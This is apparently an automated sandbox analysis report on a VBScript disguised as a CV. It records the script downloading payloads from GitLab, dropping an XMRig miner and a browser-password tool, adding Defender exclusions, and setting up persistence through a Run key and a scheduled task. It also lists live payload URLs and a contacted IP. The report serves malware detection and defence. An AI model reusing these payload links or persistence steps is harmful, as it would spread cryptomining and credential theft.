        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Users\Public\7g.exeCode function: 11_2_003BA4D0 GetSystemTimeAsFileTime,11_2_003BA4D0
        Source: C:\Users\Public\7g.exeCode function: 11_2_0041D2A0 GetVersion,GetModuleHandleW,GetProcAddress,11_2_0041D2A0

        Stealing of Sensitive Information

        barindex
        Yara detected WebBrowserPassView password recovery tool
        Source: Yara matchFile source: 11.3.7g.exe.35b7600.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: 7g.exe PID: 5428, type: MEMORYSTR
        Source: Yara matchFile source: C:\Users\Public\WindowsUpdate\ps.exe, type: DROPPED

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts311
        Windows Management Instrumentation        		1
        Windows Service        		1
        Access Token Manipulation        		1
        Disable or Modify Tools        		OS Credential Dumping1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		Exfiltration Over Other Network Medium1
        Ingress Tool Transfer        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default Accounts621
        Scripting        		1
        Scheduled Task/Job        		1
        Windows Service        		1
        Deobfuscate/Decode Files or Information        		LSASS Memory4
        File and Directory Discovery        		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
        Encrypted Channel        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain Accounts1
        Native API        		1
        Registry Run Keys / Startup Folder        		112
        Process Injection        		621
        Scripting        		Security Account Manager26
        System Information Discovery        		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
        Non-Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local Accounts1
        Exploitation for Client Execution        		Logon Script (Mac)1
        Scheduled Task/Job        		31
        Obfuscated Files or Information        		NTDS511
        Security Software Discovery        		Distributed Component Object ModelInput CaptureScheduled Transfer13
        Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud Accounts1
        Command and Scripting Interpreter        		Network Logon Script1
        Registry Run Keys / Startup Folder        		11
        Software Packing        		LSA Secrets2
        Process Discovery        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable Media1
        Scheduled Task/Job        		Rc.commonRc.common1
        File Deletion        		Cached Domain Credentials231
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote Services1
        PowerShell        		Startup ItemsStartup Items111
        Masquerading        		DCSync1
        Application Window Discovery        		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job231
        Virtualization/Sandbox Evasion        		Proc Filesystem1
        Remote System Discovery        		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
        Access Token Manipulation        		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)112
        Process Injection        		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 882715 Sample: curriculum_vitae-copie.vbs Startdate: 06/06/2023 Architecture: WINDOWS Score: 100 72 Sigma detected: Register Wscript In Run Key 2->72 74 Sigma detected: Xmrig 2->74 76 Malicious sample detected (through community Yara rule) 2->76 78 9 other signatures 2->78 8 wscript.exe 1 2->8         started        11 wscript.exe 2 2->11         started        13 wscript.exe 1 2->13         started        15 wscript.exe 2->15         started        process3 signatures4 96 System process connects to network (likely due to code injection or exploit) 8->96 98 Benign windows process drops PE files 8->98 100 VBScript performs obfuscated calls to suspicious functions 8->100 104 6 other signatures 8->104 17 wscript.exe 1 20 8->17         started        102 Wscript called in batch mode (surpress errors) 11->102 22 mservice.exe 1 11->22         started        24 wscript.exe 1 11->24         started        26 wscript.exe 13->26         started        28 wscript.exe 15->28         started        process5 dnsIp6 66 www.7-zip.org 49.12.202.237, 443, 49712 HETZNER-ASDE Germany 17->66 68 gitlab.com 172.65.251.78, 443, 49713 CLOUDFLARENETUS United States 17->68 52 C:\Users\user\AppData\Local\...\7zr[1].exe, PE32 17->52 dropped 54 C:\Users\Public\7g.exe, PE32 17->54 dropped 56 C:\Users\Public\gmail.7z, 7-zip 17->56 dropped 80 System process connects to network (likely due to code injection or exploit) 17->80 82 Wscript starts Powershell (via cmd or directly) 17->82 84 Deletes itself after installation 17->84 94 2 other signatures 17->94 30 7g.exe 10 17->30         started        34 cmd.exe 1 17->34         started        36 cmd.exe 1 17->36         started        38 wscript.exe 1 17->38         started        70 141.94.96.144, 443, 49714 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese Germany 22->70 86 Antivirus detection for dropped file 22->86 88 Multi AV Scanner detection for dropped file 22->88 90 Query firmware table information (likely to detect VMs) 22->90 92 Machine Learning detection for dropped file 22->92 40 conhost.exe 22->40         started        file7 signatures8 process9 file10 58 C:\Users\Public\WindowsUpdate\ps.exe, PE32 30->58 dropped 60 C:\Users\Public\WindowsUpdate\mservice.exe, PE32+ 30->60 dropped 62 C:\Users\Public\WindowsUpdate\go.exe, PE32 30->62 dropped 64 4 other malicious files 30->64 dropped 106 Potential malicious VBS script found (has network functionality) 30->106 108 Potential evasive VBS script found (sleep loop) 30->108 110 Sample is not signed and drops a device driver 30->110 42 conhost.exe 30->42         started        112 Wscript starts Powershell (via cmd or directly) 34->112 114 Uses schtasks.exe or at.exe to add and modify task schedules 34->114 116 Adds a directory exclusion to Windows Defender 34->116 44 powershell.exe 19 34->44         started        46 conhost.exe 34->46         started        48 conhost.exe 36->48         started        50 schtasks.exe 1 36->50         started        signatures11 process12

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        curriculum_vitae-copie.vbs3%ReversingLabsScript-WScript.Packed.Generic
        curriculum_vitae-copie.vbs10%VirustotalBrowse

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\Public\WindowsUpdate\mservice.exe100%AviraHEUR/AGEN.1311290
        C:\Users\Public\WindowsUpdate\ps.exe100%Joe Sandbox ML
        C:\Users\Public\WindowsUpdate\mservice.exe100%Joe Sandbox ML
        C:\Users\Public\7g.exe0%ReversingLabs
        C:\Users\Public\WindowsUpdate\WinRing0x64.sys5%ReversingLabs
        C:\Users\Public\WindowsUpdate\go.exe16%ReversingLabsWin32.Trojan.Generic
        C:\Users\Public\WindowsUpdate\mservice.exe83%ReversingLabsWin64.Trojan.DisguisedXMRigMiner
        C:\Users\Public\WindowsUpdate\ps.exe81%ReversingLabsWin32.Hacktool.PasswordRevealer
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\7zr[1].exe0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://xmrig.com/wizard%s0%URL Reputationsafe
        https://xmrig.com/wizard0%URL Reputationsafe
        https://xmrig.com/docs/algorithms0%URL Reputationsafe
        https://xmrig.com/docs/algorithms0%URL Reputationsafe
        https://www.recaptcha.net/0%URL Reputationsafe
        https://snowplow.tgitlab.c%0%Avira URL Cloudsafe
        https://snowplow.tgitlab.c%%.0%Avira URL Cloudsafe
        https://sentry.gitlab.net/api/105/security/?sentry_key=a42ea3adc19140d9a6424906e12fba86;0%Avira URL Cloudsafe
        https://sentry.gitlab.net0%Avira URL Cloudsafe
        https://new-sentry.gitlab.net0%Avira URL Cloudsafe
        https://snowplow.trx.gitlab.net0%Avira URL Cloudsafe
        https://snowplow.trx.gitlab.net0%VirustotalBrowse
        https://new-sentry.gitlab.net0%VirustotalBrowse
        https://sentry.gitlab.net/api/105/security/?sentry_key=a42ea3adc19140d9a6424906e12fba86;0%VirustotalBrowse

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        www.7-zip.org
        		49.12.202.237
        		truefalse
          		high
          gitlab.com
          		172.65.251.78
          		truefalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://gitlab.com/cv4345521/cv/-/raw/main/gmail.7z?inline=falsefalse
              		high
              https://www.7-zip.org/a/7zr.exefalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://www.7-zip.org/wwscript.exe, 00000005.00000003.858655277.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.000002216310C000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=falseewscript.exe, 00000017.00000002.881382988.000001E320C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000002.899241012.000001FFE0BB5000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://gitlab.com/cv4345521/cv/-/raw/main/gmail.7z?inline=falseAwscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://xmrig.com/wizard%s7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.11.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://new-sentry.gitlab.netwscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://snowplow.trx.gitlab.netwscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.857991730.0000022163565000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://sentry.gitlab.net/api/105/security/?sentry_key=a42ea3adc19140d9a6424906e12fba86;wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.857991730.0000022163565000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://xmrig.com/wizard7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.11.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://gitlab.com/wscript.exe, 00000005.00000003.811414806.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858655277.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.000002216311D000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://www.7-zip.org/Owscript.exe, 00000005.00000003.858655277.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.000002216310C000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://snowplow.tgitlab.c%wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          https://gitlab.comwscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://gitlab.com/cwIfwscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=falsewscript.exe, 00000019.00000002.899281249.000001FFE25D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000002.899123544.000001FFE0938000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000002.899241012.000001FFE0BB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898695255.000001FFE094D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898409186.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898525051.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000002.899199737.000001FFE094E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898567720.000001FFE0943000.00000004.00000020.00020000.00000000.sdmp, sarmat.vbs.11.drfalse
                                		high
                                https://www.7-zip.org/a/7zr.exelwscript.exe, 00000005.00000003.858386999.0000022162F60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860549226.0000022162F61000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.856009779.0000022162F60000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=falseMsgwscript.exe, 00000015.00000002.992417001.0000016591D38000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898409186.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898525051.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898567720.000001FFE0943000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://gitlab.com/-/sandbox/wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://gitlab.com/admin/wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://gitlab.com/assets/wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://customers.gitlab.comwscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://gitlab.com/-/speedscope/index.htmlwscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.google.com/recaptcha/wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://xmrig.com/docs/algorithms7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.11.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                https://sourcegraph.comwscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.857991730.0000022163565000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://gitlab.com/cv4345521/cv/-/raw/main/gmail.7z?inline=falsexwscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://apis.google.comwscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.857991730.0000022163565000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://snowplow.tgitlab.c%%.wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low
                                                      http://www.nirsoft.net/7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.drfalse
                                                        		high
                                                        https://sentry.gitlab.netwscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://gitlab.com/cv4345521/cv/-/raw/main/gmail.7z?inline=falsemwscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.recaptcha.net/wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          172.65.251.78
                                                          		gitlab.comUnited States
                                                          		13335CLOUDFLARENETUSfalse
                                                          49.12.202.237
                                                          		www.7-zip.orgGermany
                                                          		24940HETZNER-ASDEfalse
                                                          141.94.96.144
                                                          		unknownGermany
                                                          		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesetrue

                                                          General Information

                                                          Joe Sandbox Version:37.1.0 Beryl
                                                          Analysis ID:882715
                                                          Start date and time:2023-06-06 17:24:56 +02:00
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 13m 45s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:25
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:1
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample file name:curriculum_vitae-copie.vbs
                                                          Detection:MAL
                                                          Classification:mal100.troj.evad.mine.winVBS@29/17@2/3
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HDC Information:
                                                          • Successful, ratio: 6.9% (good quality ratio 6.9%)
                                                          • Quality average: 84.7%
                                                          • Quality standard deviation: 18.3%
                                                          HCA Information:
                                                          • Successful, ratio: 98%
                                                          • Number of executed functions: 103
                                                          • Number of non-executed functions: 106
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .vbs
                                                          • Override analysis time to 240s for JS/VBS files not yet terminated

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, WmiPrvSE.exe, svchost.exe
                                                          • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtSetInformationFile calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          17:25:58API Interceptor44x Sleep call for process: powershell.exe modified
                                                          17:28:51AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Media Service wscript.exe "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
                                                          17:28:52Task SchedulerRun new task: MicrosoftUpdateService path: wscript.exe s>C:\Users\Public\windowsupdate\mservice.vbs //b //nologo
                                                          17:29:00AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Media Service wscript.exe "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          172.65.251.78build_setup.exeGet hashmaliciousVidarBrowse
                                                          • gitlab.com/greg201/ppi3/-/raw/main/Setup.exe?inline=false

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          gitlab.comCrashHandler2.exeGet hashmaliciousUnknownBrowse
                                                          • 172.65.251.78
                                                          curriculum_vitae-copie.vbsGet hashmaliciousUnknownBrowse
                                                          • 172.65.251.78
                                                          curriculum_vitae-copie.vbsGet hashmaliciousUnknownBrowse
                                                          • 172.65.251.78
                                                          61242Pp10w.exeGet hashmaliciousDCRat, RedLine, SmokeLoaderBrowse
                                                          • 172.65.251.78
                                                          p4pEBxCplv.exeGet hashmaliciousDCRat, RedLine, SmokeLoaderBrowse
                                                          • 172.65.251.78
                                                          JC4Fer2SNi.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                          • 172.65.251.78
                                                          rain.exeGet hashmaliciousAsyncRATBrowse
                                                          • 172.65.251.78
                                                          Blender 2.93.0 Crack Key 3D (Torrent) Free Download Downloader.exeGet hashmaliciousRedLineBrowse
                                                          • 172.65.251.78
                                                          tmpBA2F.vbsGet hashmaliciousUnknownBrowse
                                                          • 172.65.251.78
                                                          tmp3F72.vbsGet hashmaliciousUnknownBrowse
                                                          • 172.65.251.78
                                                          tmp381D.vbsGet hashmaliciousUnknownBrowse
                                                          • 172.65.251.78
                                                          tmpE473.vbsGet hashmaliciousUnknownBrowse
                                                          • 172.65.251.78
                                                          MultiHack Menu.exeGet hashmaliciousRedLineBrowse
                                                          • 172.65.251.78
                                                          ProtonVPN 2.4.31 Crack Full Working License Key Download Downloader.exeGet hashmaliciousRedLineBrowse
                                                          • 172.65.251.78
                                                          file.exeGet hashmaliciousAmadey, CryptOne, Djvu, RedLine, SmokeLoader, VidarBrowse
                                                          • 172.65.251.78
                                                          R3v2sPqt1J.exeGet hashmaliciousAmadey, RedLine, SmokeLoaderBrowse
                                                          • 172.65.251.78
                                                          file.exeGet hashmaliciousAmadey, RedLineBrowse
                                                          • 172.65.251.78
                                                          Install.exeGet hashmaliciousRedLineBrowse
                                                          • 172.65.251.78
                                                          klbisQNtgP.exeGet hashmaliciousAsyncRAT, PhoenixRATBrowse
                                                          • 172.65.251.78
